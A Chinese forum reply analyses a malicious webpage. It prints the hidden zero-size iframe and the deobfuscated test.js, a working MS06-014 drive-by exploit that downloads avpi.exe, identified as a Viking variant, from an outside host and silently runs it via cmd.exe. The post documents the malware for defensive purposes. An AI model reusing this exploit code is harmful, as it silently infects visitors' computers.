楼主给的网页,进入后跳转到default.htm,下方有:
<iframe src="http://mail.down988.cn/bill/index.htm" width="0" height="0" frameborder="0"></iframe>
此index.htm的内容:
<script language=javascript src=http://mail.down988.cn/bill/test.js></script>
<script language="javascript" src="http://ww1.tongji123.com/t1.aspx?id=11907117"></script>
下面那段是流量统计,而上面的test.js,是经加密的代码,还原后如下:
function gn(n) { var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; } try { dl='http://mail.down988.cn/get/avpi.exe'; var df=document.createElement("
object"); df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var x=df.Create
Object("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var S=df.Create
Object("Adodb.Stream",""); S.type=1; x.open("GET", dl,0); x.send(); fname1=gn(10000); var F=df.Create
Object("Scripting.FileSystem
Object",""); var tmp=F.GetSpecialFolder(0); fname1= F.BuildPath(tmp,fname1); S.Open();S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close(); var Q=df.Create
Object("Shell.Application",""); exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); Q.ShellExecute(exp1,' /c '+fname1,"","open",0); } catch(i) { i=1; }
利用MS06-014漏洞,下载http://mail.down988.cn/get/avpi.exe到本机
此avpi.exe,viking变种,瑞星最新版本尚不能查杀。正在验证置顶帖提供的专杀的最新病毒库是否能查杀。